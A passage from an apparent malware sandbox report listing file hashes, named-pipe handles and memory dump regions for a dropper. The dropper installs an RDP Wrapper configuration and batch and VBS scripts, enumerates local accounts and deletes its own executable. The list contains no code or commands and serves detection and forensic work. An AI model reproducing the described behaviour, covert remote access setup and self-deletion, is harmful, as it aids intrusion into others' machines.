  SHA512: 421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
- C:\Program Files\Common Files\Services\rdpwrap.ini
  MD5: aada14668a752e946ec217cd05914107
  SHA1: 712bfebbe7cea17865cb5eff8ea227d1dd930e4d
  SHA256: 866c1ae68b4f1e77dc894289895bf83036028ab6dc2aefcb310d3f80fa705589
  SHA512: f1c8485defdc8f1acb9246ac26b0e0425ddd268fbc22a8ffc894d157273841888d617e10981304b2810cd615dd21e9ebaa76c158ad49c8077397f3fc5da8cfbb
- C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.bat
  MD5: 296ddd4ff315bc654ef9a115e6d00927
  SHA1: 27a1a3ae50c560a7635b826b77b2bea3c649d11a
  SHA256: 76458f40126c21a890e97da5bd20b219c2eb83cc4171d958335d5fcc22f3860b
  SHA512: 1a793e98413253f59b36d3e13c90821645e4f0b3d9c81959cbcd3cfd09a60298b974ea7cc77a420668f35766b17766e8b07a68189b40aabbd4adde26b81a4574
- C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbs
  MD5: 4c9bf0719250bbbf5a44ad421e0c00f4
  SHA1: dd686bfa711732d30611b0bdcc1f270ba3828180
  SHA256: 12bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f
  SHA512: d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0
- C:\Users\Public\iv3yydjq.exe (also recorded as \??\c:\Users\Public\iv3yydjq.exe with identical hashes; the dropper deletes this file during the run, so these hashes are the only record of it)
  MD5: b28986509331c265eefa7c7300fa0227
  SHA1: 582fe31db734e32946fd4ea52fe4bcc12864f120
  SHA256: 2075b6cc6c3d8b4c0540208f6ec590c1d8b3d74d9294a17fb1790afd5222b161
  SHA512: 4369599d07437cb3d9e6ab9cf54beead697aafc277c7c243b2d8fdd59e9844ca58be8a1aae43d22a9588f1c65be0d47f2ab93b81fde90aeab1b5a438f1a3b6d6
- \??\PIPE\lsarpc, \??\PIPE\samr, \??\PIPE\samr (three named-pipe handles consistent with the net user / net localgroup calls; the captured content is empty, the hashes below are those of zero-length input)
  MD5: d41d8cd98f00b204e9800998ecf8427e
  SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
- \??\c:\Users\Public\qpcxh2bd.inf
  MD5: 1cdc414cdbc6b9ffd3c28c8d9057424a
  SHA1: dc541c5244f9b09d63a250ca11ac36428b902437
  SHA256: 81e1cc88e49fef04a6b8d8172e1cde4e9b014240a9bdc8bde66898c1b7424ee4
  SHA512: a1518a8ec921e105093313d862b3e3ffe0bc2a2ff63a59c8c67082b5b8cdf931b0488d72c857ac551e9d49f4baaf0dd4e9278e346b6be8b7b7b0c2fb0a9e43a9
- memory/744-60-0x0000000000D86000-0x0000000000DA5000-memory.dmp  Filesize: 124KB
- memory/744-55-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmp  Filesize: 4KB
- memory/744-57-0x000007FEF2920000-0x000007FEF39B6000-memory.dmp  Filesize: 16.6MB
- memory/744-56-0x0000000000D80000-0x0000000000D82000-memory.dmp  Filesize: 8KB
- memory/1288-59-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmp  Filesize: 8KB
- memory/1544-65-0x0000000075321000-0x0000000075323000-memory.dmp  Filesize: 8KB